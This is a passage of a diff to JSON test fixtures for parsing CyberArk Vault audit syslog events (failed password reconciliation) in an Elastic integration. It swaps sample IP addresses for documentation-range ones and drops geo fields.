\u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615803137\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "1", - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -682,7 +620,7 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -696,8 +634,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176784500Z", - "original": "\u003c7\u003e1 2021-03-15T10:12:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:19\",\"IsoTimestamp\":\"2021-03-15T10:12:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403095100Z", + "original": "\u003c7\u003e1 2021-03-15T10:12:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:19\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:19Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615803137\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:19\",\"IsoTimestamp\":\"2021-03-15T10:12:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615803137\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -725,19 +663,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -757,7 +684,7 @@ }, "@timestamp": "2021-03-15T12:57:13.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -769,28 +696,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-15T12:57:13Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=5;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMDisabled\" Value=\"(CPM)MaxRetries\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"5\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615813031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "5", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -802,9 +729,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615813031", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -818,8 +745,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176785800Z", - "original": "\u003c7\u003e1 2021-03-15T12:57:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 05:57:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T12:57:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"(CPM)MaxRetries\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"5\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 05:57:13\",\"IsoTimestamp\":\"2021-03-15T12:57:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #5). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=5;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password 